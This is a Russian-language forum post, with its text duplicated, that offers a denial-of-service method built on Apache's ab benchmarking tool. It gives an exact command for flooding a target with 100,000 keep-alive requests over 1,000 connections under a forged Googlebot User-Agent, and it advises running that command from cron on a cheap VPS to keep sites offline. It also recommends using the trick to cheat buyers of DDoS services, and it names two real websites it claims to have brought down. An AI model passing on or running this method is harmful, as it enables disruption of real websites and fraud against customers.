vigilante
Premium Lite
- Регистрация
- 8 Ноя 2015
- Сообщения
- 293
- Реакции
- 8,168
- Тема Автор Вы автор данного материала? |
- #1
Голосов: 0
Данный метод DOS иногда применяют для развода тех, кто хочет заказать реальный DDOS сайта конкурента.
Системные администраторы конечно знают, но многие обычные юзеры нет, что у апача есть забавная утилитка для стресс тестирования. Зовется очень просто ab
ab -h
выдает что то вроде этого:
С помощью этой очень простой утилитки можно запустить хуеву тучу поноса на определенный сайт с различными параметрами.
Например, ab -n 100000 -c 1000 -r -k -H "User-Agent: Google Bot" http://www.target.com/
Апач запустить 1000 одновременных соединений к цели и будет пытаться сделать 100000 запросов. При этом стараться все соединения держать keep-alive и не обрывать процесс при возникновении ошибки. Дополнительно в заголовках передаем User-Agent - в логах атакуемого сервака будет отображаться Google Bot.
Просто и эффективно для вывода сайта в оффлайн на короткий промежуток времени.
Когда тулза закончит работу, она покажет сколько было занято времени на тестирование, сколько пакетов в секунду улетало, ну и другая инфа.
Далее, зная, что по данному сайту прога отрабатывает например 100000 соединений за 5 минут, можно прописать запуск скрипта в кронтаб на каждые 10 минут. В итоге пока админы не поймут че за херня творится с сайтом, сайт будет в оффлайне.
Все что вам нужно, это VPS сервак с рут доступом. Без администрирования со стороны хостера такие серваки стоят от 3 до 15 баксов за год! Кто ищет тот обрящет. В гугле cheap unmanaged vps
Как я написал вначале многие юзают эту тулзу для развода заказчиков на DDOS. Ведь нам надо только продемонстрировать, что у нас охуенные мега ддос сервис в 500 гб.
Тулза особенно эффективная против различных скриптов, которые делают много запросов к базе данных - в этом случае быстрее всего улетает в оффлайн mysql сервак.
Ну и напоследок пример ударов по различным сайтам из рейтинга топ маил ру
http://m.ua/ - посещаемость примерно 900 тыс. юзеров в месяц - упал сразу
http://www.libex.ru/ - книжный интернет магазин, посещаемость около 27 тыс. юзеров в месяц - упал сразу
Методика действует супротив любых проектов, акромя тех кто под антиддос защитой и тех, где встречаются в природе грамотные сисадмины.
Системные администраторы конечно знают, но многие обычные юзеры нет, что у апача есть забавная утилитка для стресс тестирования. Зовется очень просто ab
ab -h
выдает что то вроде этого:
PHP:
[== PHP ==]
root@server:~# ab -h
Usage: ab [options] [http://]hostname[:port]/path
Options are:
-n requests Number of requests to perform
-c concurrency Number of multiple requests to make
-t timelimit Seconds to max. wait for responses
-b windowsize Size of TCP send/receive buffer, in bytes
-p postfile File containing data to POST. Remember also to set -T
-u putfile File containing data to PUT. Remember also to set -T
-T content-type Content-type header for POSTing, eg.
'application/x-www-form-urlencoded'
Default is 'text/plain'
-v verbosity How much troubleshooting info to print
-w Print out results in HTML tables
-i Use HEAD instead of GET
-x attributes String to insert as table attributes
-y attributes String to insert as tr attributes
-z attributes String to insert as td or th attributes
-C attribute Add cookie, eg. 'Apache=1234. (repeatable)
-H attribute Add Arbitrary header line, eg. 'Accept-Encoding: gzip'
Inserted after all normal header lines. (repeatable)
-A attribute Add Basic WWW Authentication, the attributes
are a colon separated username and password.
-P attribute Add Basic Proxy Authentication, the attributes
are a colon separated username and password.
-X proxy:port Proxyserver and port number to use
-V Print version number and exit
-k Use HTTP KeepAlive feature
-d Do not show percentiles served table.
-S Do not show confidence estimators and warnings.
-g filename Output collected data to gnuplot format file.
-e filename Output CSV file with percentages served
-r Don't exit on socket receive errors.
-h Display usage information (this message)
-Z ciphersuite Specify SSL/TLS cipher suite (See openssl ciphers)
-f protocol Specify SSL/TLS protocol (SSL3, TLS1, or ALL)
root@server:~#
С помощью этой очень простой утилитки можно запустить хуеву тучу поноса на определенный сайт с различными параметрами.
Например, ab -n 100000 -c 1000 -r -k -H "User-Agent: Google Bot" http://www.target.com/
Апач запустить 1000 одновременных соединений к цели и будет пытаться сделать 100000 запросов. При этом стараться все соединения держать keep-alive и не обрывать процесс при возникновении ошибки. Дополнительно в заголовках передаем User-Agent - в логах атакуемого сервака будет отображаться Google Bot.
Просто и эффективно для вывода сайта в оффлайн на короткий промежуток времени.
Когда тулза закончит работу, она покажет сколько было занято времени на тестирование, сколько пакетов в секунду улетало, ну и другая инфа.
Далее, зная, что по данному сайту прога отрабатывает например 100000 соединений за 5 минут, можно прописать запуск скрипта в кронтаб на каждые 10 минут. В итоге пока админы не поймут че за херня творится с сайтом, сайт будет в оффлайне.
Все что вам нужно, это VPS сервак с рут доступом. Без администрирования со стороны хостера такие серваки стоят от 3 до 15 баксов за год! Кто ищет тот обрящет. В гугле cheap unmanaged vps
Как я написал вначале многие юзают эту тулзу для развода заказчиков на DDOS. Ведь нам надо только продемонстрировать, что у нас охуенные мега ддос сервис в 500 гб.
Тулза особенно эффективная против различных скриптов, которые делают много запросов к базе данных - в этом случае быстрее всего улетает в оффлайн mysql сервак.
Ну и напоследок пример ударов по различным сайтам из рейтинга топ маил ру
http://m.ua/ - посещаемость примерно 900 тыс. юзеров в месяц - упал сразу
http://www.libex.ru/ - книжный интернет магазин, посещаемость около 27 тыс. юзеров в месяц - упал сразу
Методика действует супротив любых проектов, акромя тех кто под антиддос защитой и тех, где встречаются в природе грамотные сисадмины.